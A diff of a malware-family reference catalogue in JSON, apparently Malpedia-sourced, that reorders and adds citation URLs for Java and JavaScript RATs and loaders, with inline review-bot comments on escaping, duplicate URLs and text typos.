"https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf", + "https://colin.guru/index.php?title=Advanced_Banload_Analysis" ], "synonyms": [], "type": [] @@ -7524,8 +7864,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat", - "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", - "https://objective-see.com/blog/blog_0x28.html" + "https://objective-see.com/blog/blog_0x28.html", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" ], "synonyms": [ "Trupto" 
@@ -7535,6 +7875,21 @@
 "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84",
 "value": "CrossRAT"
 },
+ {
+ "description": "DynamicRAT is a malware that is spread via email attachments and compromises the security of computer systems. Once running on a device, DynamicRAT establishes a persistent presence and gives attackers complete remote control. Its features include sensitive data exfiltration, hardware control, remote action, and the ability to perform DDoS attacks. In addition, DynamicRAT uses evasion and persistence techniques to evade detection and analysis by security solutions.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.dynamicrat",
+ "https://gi7w0rm.medium.com/dynamicrat-a-full-fledged-java-rat-1a2dabb11694"
+ ],
+ "synonyms": [
+ "DYNARAT"
+ ],
+ "type": []
+ },
+ "uuid": "28539c3d-89a4-4dd6-85f5-f4c95808c0b7",
+ "value": "DynamicRAT"
+ },
 {
 "description": "EpicSplit RAT is a multiplatform Java RAT that is capable of running shell commands, downloading, uploading, and executing files, manipulating the file system, establishing persistence, taking screenshots, and manipulating keyboard and mouse events. EpicSplit is typically obfuscated with the commercial Allatori Obfuscator software. One unique feature of the malware is that TCP messages sent by EpicSplit RAT to its C2 are terminated with the string \"_packet_\" as a packet delimiter.",
 "meta": {
@@ -7609,11 +7964,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat",
- "https://research.checkpoint.com/malware-against-the-c-monoculture/",
 "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered",
- "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/",
- "https://www.eff.org/files/2018/01/29/operation-manul.pdf"
+ "https://www.eff.org/files/2018/01/29/operation-manul.pdf",
+ "https://research.checkpoint.com/malware-against-the-c-monoculture/",
+ "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/"
 ],
 "synonyms": [
 "Jacksbot"
@@ -7668,13 +8023,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qealler",
- "https://www.herbiez.com/?p=1352",
- "https://github.com/jeFF0Falltrades/Malware-Writeups/blob/master/Qealler/Qealler-Unloaded.pdf",
- "https://www.securityinbits.com/malware-analysis/similarity-between-qealler-pyrogenic-variants-part-0x3/",
- "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer",
 "https://www.securityinbits.com/malware-analysis/unpacking/unpacking-pyrogenic-qealler-using-java-agent-part-0x2/",
- "https://www.cyberark.com/threat-research-blog/qealler-the-silent-java-credential-thief/",
- "https://www.securityinbits.com/malware-analysis/pyrogenic-infostealer-static-analysis-part-0x1/"
+ "https://www.herbiez.com/?p=1352",
+ "https://www.securityinbits.com/malware-analysis/similarity-between-qealler-pyrogenic-variants-part-0x3/",
+ "https://github.com/jeFF0Falltrades/Malware-Writeups/blob/master/Qealler/Qealler-Unloaded.pdf",
+ "https://www.securityinbits.com/malware-analysis/pyrogenic-infostealer-static-analysis-part-0x1/",
+ "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer",
+ "https://www.cyberark.com/threat-research-blog/qealler-the-silent-java-credential-thief/"
 ],
 "synonyms": [
 "Pyrogenic Infostealer"
@@ -7690,8 +8045,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat",
 "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/",
- "https://www.digitrustgroup.com/java-rat-qrat/",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rats-and-spam-the-nodejs-qrat/",
+ "https://www.digitrustgroup.com/java-rat-qrat/",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/"
 ],
 "synonyms": [
@@ -7707,8 +8062,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty",
- "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/",
- "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/"
+ "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
+ "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/"
 ],
 "synonyms": [],
 "type": []
@@ -7717,7 +8072,7 @@
 "value": "Ratty"
 },
 {
- "description": "Sorillus is a Java-based multifunctional remote access trojan (RAT) which targets Linux, macOS and Windows operating systems. While it was first created in 2019, interest in the tool has increased considerably in 2022. Beginning on January 18, 2022, different obfuscated client versions of the tool started to be uploaded to VirusTotal. Sorillus' features are described in detail on its website (hxxps://sorillus[.]com). The tool supposedly costs 49.99€ for lifetime access but is currently available at a discounted 19.99€. Conveniently, the Sorillus can be purchased via a variety of cryptocurrencies. The tool's creator and distributor, a YouTube user known as \"Tapt\", asserts that the tool is able to collect the following information from its target:\r\n- HardwareID\r\n- Username\r\n- Country\r\n- Language\r\n- Webcam\r\n- Headless\r\n- Operating system\r\n- Client Version",
+ "description": "Sorillus is a Java-based multifunctional remote access trojan (RAT) which targets Linux, macOS and Windows operating systems. While it was first created in 2019, interest in the tool has increased considerably in 2022. Beginning on January 18, 2022, different obfuscated client versions of the tool started to be uploaded to VirusTotal. Sorillus' features are described in detail on its website (hxxps://sorillus[.]com). The tool supposedly costs 49.99\u20ac for lifetime access but is currently available at a discounted 19.99\u20ac. Conveniently, the Sorillus can be purchased via a variety of cryptocurrencies. The tool's creator and distributor, a YouTube user known as \"Tapt\", asserts that the tool is able to collect the following information from its target:\r\n- HardwareID\r\n- Username\r\n- Country\r\n- Language\r\n- Webcam\r\n- Headless\r\n- Operating system\r\n- Client Version",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/jar.sorillus",
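Review bot: The only change to the Sorillus description is that `€` is now written as `\u20ac`; the BELLHOP (L654), DarkWatchman (L655) and GRIFFON (L662) hunks make the same literal-to-escape substitution for `•`, `ü` and `’`. Both spellings decode to identical strings, so nothing changes for consumers, but it indicates the exporter switched to ASCII-only output (for example Python's `json.dumps(..., ensure_ascii=True)`). If the rest of the file still holds literal non-ASCII text, the cluster ends up with mixed escaping, so the whole file should be regenerated under one setting and that setting pinned in the generator so later diffs are not dominated by re-escaping.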
@@ -7734,20 +8089,20 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/jar.strrat",
- "https://forensicitguy.github.io/strrat-attached-to-msi/",
- "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
 "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
+ "https://www.fortinet.com/blog/threat-research/new-strrat-rat-phishing-campaign",
+ "https://www.jaiminton.com/reverse-engineering/strrat#",
 "https://any.run/cybersecurity-blog/strrat-malware-analysis-of-a-jar-archive/",
+ "https://twitter.com/MsftSecIntel/status/1395138347601854465",
+ "https://forensicitguy.github.io/strrat-attached-to-msi/",
+ "https://www.jaiminton.com/reverse-engineering/strrat",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://resources.securityscorecard.com/cybersecurity/analyze-java-malware-strrat#page=1",
 "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
 "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-strrat-zloader-honeygain",
- "https://www.fortinet.com/blog/threat-research/new-strrat-rat-phishing-campaign",
- "https://www.jaiminton.com/reverse-engineering/strrat",
- "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
- "https://resources.securityscorecard.com/cybersecurity/analyze-java-malware-strrat#page=1",
 "https://www.gdatasoftware.com/blog/strrat-crimson",
 "https://isc.sans.edu/diary/rss/27798",
- "https://www.jaiminton.com/reverse-engineering/strrat#",
- "https://twitter.com/MsftSecIntel/status/1395138347601854465"
+ "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape"
 ],
 "synonyms": [],
 "type": []
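Review bot: The new `refs` list for `jar.strrat` carries both `https://www.jaiminton.com/reverse-engineering/strrat#` and `https://www.jaiminton.com/reverse-engineering/strrat`, which resolve to the same page and differ only by an empty fragment; the GRIFFON hunk on L662–L663 has the same problem with the Microsoft ransomware-as-a-service URL listed once with and once without a trailing slash. Both pairs pre-date this commit, but the reordering here moves the twins apart, which makes the duplication harder to notice on review. Normalising URLs (strip empty fragments and trailing slashes) before de-duplicating in the export step would remove them, or they can be reported upstream to Malpedia so the source data is fixed.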
@@ -7789,8 +8144,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak",
 "http://www.kahusecurity.com/posts/reflow_javascript_backdoor.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
- "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html"
+ "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk"
 ],
 "synonyms": [
 "Orz"
@@ -7805,11 +8160,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
 "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
 "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor",
- "https://www.secureworks.com/research/threat-profiles/gold-niagara"
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
+ "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
 ],
 "synonyms": [],
 "type": []
@@ -7818,13 +8173,13 @@
 "value": "Bateleur"
 },
 {
- "description": "• BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n• Creating a Run key in the Registry\r\n• Creating a RunOnce key in the Registry\r\n• Creating a persistent named scheduled task\r\n• BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n",
+ "description": "\u2022 BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n\u2022 Creating a Run key in the Registry\r\n\u2022 Creating a RunOnce key in the Registry\r\n\u2022 Creating a persistent named scheduled task\r\n\u2022 BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
 "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf"
+ "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
 ],
 "synonyms": [],
 "type": []
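Review bot: The rewritten BELLHOP description still contains the embedded `\t` characters inside running text (`is\ta JavaScript`, `dropper\tdownloads`, `and\tsets\tup`, `HTTP\tand`, `Google\tDocs`), which look like column artefacts from the PDF the summary was copied from rather than intentional formatting. Since the patch already rewrites this string to change the bullet escaping, it would be the moment to normalise those tabs to single spaces, or to fix the text upstream if this file is regenerated verbatim from Malpedia. The `\r\n`-separated bullet list is presumably intended and can stay.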
@@ -7837,12 +8192,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch",
- "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf",
- "https://www.macnica.net/file/mpression_automobile.pdf",
- "https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/",
- "https://www.codercto.com/a/46729.html",
 "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/",
- "https://github.com/mdsecactivebreach/CACTUSTORCH"
+ "https://github.com/mdsecactivebreach/CACTUSTORCH",
+ "https://www.codercto.com/a/46729.html",
+ "https://www.macnica.net/file/mpression_automobile.pdf",
+ "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf",
+ "https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/"
 ],
 "synonyms": [],
 "type": []
@@ -7894,12 +8249,12 @@
 "value": "CukieGrab"
 },
 {
- "description": "Prevailion found this RAT written in JavaScript, which dynamically compiles an accompanying keylogger written in C# and uses a DGA für C&C.",
+ "description": "Prevailion found this RAT written in JavaScript, which dynamically compiles an accompanying keylogger written in C# and uses a DGA f\u00fcr C&C.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.darkwatchman",
- "https://www.prevailion.com/darkwatchman-new-fileness-techniques/",
- "https://securityintelligence.com/posts/hive00117-fileless-malware-delivery-eastern-europe/"
+ "https://securityintelligence.com/posts/hive00117-fileless-malware-delivery-eastern-europe/",
+ "https://www.prevailion.com/darkwatchman-new-fileness-techniques/"
 ],
 "synonyms": [],
 "type": []
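Review bot: The DarkWatchman description on the new side keeps the wording `uses a DGA f\u00fcr C&C`, where `für` is the German word for "for" that slipped into an otherwise English sentence; re-escaping it as `\u00fc` preserves the slip rather than fixing it. The intended text is presumably `uses a DGA for C&C`. As this cluster appears to be exported from Malpedia, the correction belongs in the upstream description so it is not overwritten on the next regeneration.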
@@ -7912,8 +8267,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.dnsrat",
- "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/"
 ],
 "synonyms": [
 "DNSbot"
@@ -7958,16 +8313,16 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.evilnum",
 "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf",
- "https://github.com/eset/malware-ioc/tree/master/evilnum",
- "http://blog.nsfocus.net/agentvxapt-evilnum/",
- "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
- "https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets",
 "http://www.pwncode.io/2018/05/javascript-based-bot-using-github-c.html",
 "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw",
- "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/",
+ "https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets",
+ "https://securelist.com/deathstalker-mercenary-triumvirate/98177/",
+ "http://blog.nsfocus.net/agentvxapt-evilnum/",
 "https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html",
 "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://securelist.com/deathstalker-mercenary-triumvirate/98177/"
+ "https://github.com/eset/malware-ioc/tree/master/evilnum",
+ "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/",
+ "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/"
 ],
 "synonyms": [],
 "type": []
@@ -7980,29 +8335,30 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.fakeupdates",
- "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://www.lac.co.jp/lacwatch/report/20220407_002923.html",
- "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
- "https://www.sentinelone.com/labs/socgholish-diversifies-and-expands-its-malware-staging-infrastructure-to-counter-defenders/",
- "https://www.mandiant.com/resources/they-come-in-the-night-ransomware-deployment-trends",
- "https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm",
 "https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/",
- "https://www.digitalinformationworld.com/2022/04/threatening-redirect-web-service.html",
- "https://blog.malwarebytes.com/threat-intelligence/2022/06/makemoney-malvertising-campaign-adds-fake-update-template/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt",
- "https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
 "https://experience.mandiant.com/trending-evil/p/1",
- "https://twitter.com/MsftSecIntel/status/1522690116979855360",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
- "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.sentinelone.com/labs/socgholish-diversifies-and-expands-its-malware-staging-infrastructure-to-counter-defenders/",
 "https://expel.io/blog/incident-report-spotting-socgholish-wordpress-injection/",
- "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
+ "https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/",
+ "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
+ "https://twitter.com/MsftSecIntel/status/1522690116979855360",
+ "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/06/makemoney-malvertising-campaign-adds-fake-update-template/",
+ "https://www.mandiant.com/resources/they-come-in-the-night-ransomware-deployment-trends",
+ "https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://www.lac.co.jp/lacwatch/report/20220407_002923.html",
 "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
+ "https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
 "https://www.menlosecurity.com/blog/increase-in-attack-socgholish",
 "https://blog.sucuri.net/2022/08/socgholish-5-years-of-massive-website-infections.html",
- "https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems"
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
+ "https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm",
+ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack",
+ "https://www.digitalinformationworld.com/2022/04/threatening-redirect-web-service.html"
 ],
 "synonyms": [
 "FakeUpdate",
@@ -8014,25 +8370,31 @@
 "value": "FAKEUPDATES"
 },
 {
- "description": "",
+ "description": "According to PCrisk, they discovered GootLoader malware while examining legitimate but compromised websites (mainly websites managed using WordPress). It was found that GootLoader is used to infect computers with additional malware. Cybercriminals using GootLoader seek to trick users into unknowingly downloading and executing the malware by disguising it as a document or other file.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.gootloader",
- "https://dinohacks.blogspot.com/2022/06/loading-gootloader.html",
- "https://blogs.blackberry.com/en/2022/07/gootloader-from-seo-poisoning-to-multi-stage-downloader",
- "https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf",
- "https://www.esentire.com/web-native-pages/gootloader-unloaded",
- "https://labs.sentinelone.com/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/",
- "https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations",
- "https://experience.mandiant.com/trending-evil/p/1",
- "https://www.esentire.com/blog/gootloader-leads-to-cobalt-strike-and-hand-on-keyboard-activity",
+ "https://gootloader.wordpress.com/2023/01/05/gootloader-command-control/",
 "https://www.esentire.com/blog/gootloader-striking-with-a-new-infection-technique",
- "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
- "https://redcanary.com/blog/gootloader",
- "https://threatresearch.ext.hp.com/tips-for-automating-ioc-extraction-from-gootloader-a-changing-javascript-malware/",
- "https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/",
+ "https://experience.mandiant.com/trending-evil/p/1",
+ "https://web.archive.org/web/20230209123148/https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf",
+ "https://gootloader.wordpress.com/2023/01/05/what-is-gootloader/",
+ "https://www.kroll.com/en/insights/publications/cyber/deep-dive-gootloader-malware-infection-chain",
+ "https://www.esentire.com/blog/gootloader-leads-to-cobalt-strike-and-hand-on-keyboard-activity",
+ "https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/gootloader-why-your-legal-document-search-may-end-in-misery/",
 "https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/",
- "https://community.riskiq.com/article/f5d5ed38"
+ "https://www.esentire.com/web-native-pages/gootloader-unloaded",
+ "https://community.riskiq.com/article/f5d5ed38",
+ "https://threatresearch.ext.hp.com/tips-for-automating-ioc-extraction-from-gootloader-a-changing-javascript-malware/",
+ "https://redcanary.com/blog/gootloader",
+ "https://www.reliaquest.com/blog/gootloader-infection-credential-access/",
+ "https://labs.sentinelone.com/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/",
+ "https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf",
+ "https://dinohacks.blogspot.com/2022/06/loading-gootloader.html",
+ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/",
+ "https://blogs.blackberry.com/en/2022/07/gootloader-from-seo-poisoning-to-multi-stage-downloader"
 ],
 "synonyms": [],
 "type": []
@@ -8056,24 +8418,24 @@
 "value": "grelos"
 },
 {
- "description": "GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.",
+ "description": "GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
- "https://www.mandiant.com/resources/evolution-of-fin7",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/",
- "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
 "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/",
- "https://twitter.com/ItsReallyNick/status/1059898708286939136",
- "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
 "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
+ "https://www.mandiant.com/resources/evolution-of-fin7",
+ "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape",
 "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/"
+ "https://twitter.com/ItsReallyNick/status/1059898708286939136"
 ],
 "synonyms": [
 "Harpy"
@@ -8141,14 +8503,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack",
- "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
- "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/",
 "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
 "https://www.mandiant.com/resources/blog/turla-galaxy-opportunity",
+ "https://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html",
+ "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/",
+ "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
 "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
- "https://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html"
+ "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack"
 ],
 "synonyms": [],
 "type": []
@@ -8161,10 +8523,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.lnkr",
- "https://github.com/Zenexer/lnkr/blob/master/recon/extensions/fanagokoaogopceablgmpndejhedkjjb/README.md",
- "https://www.riskiq.com/blog/labs/lnkr-browser-extension/",
+ "https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/",
 "https://github.com/Zenexer/lnkr",
- "https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/"
+ "https://www.riskiq.com/blog/labs/lnkr-browser-extension/",
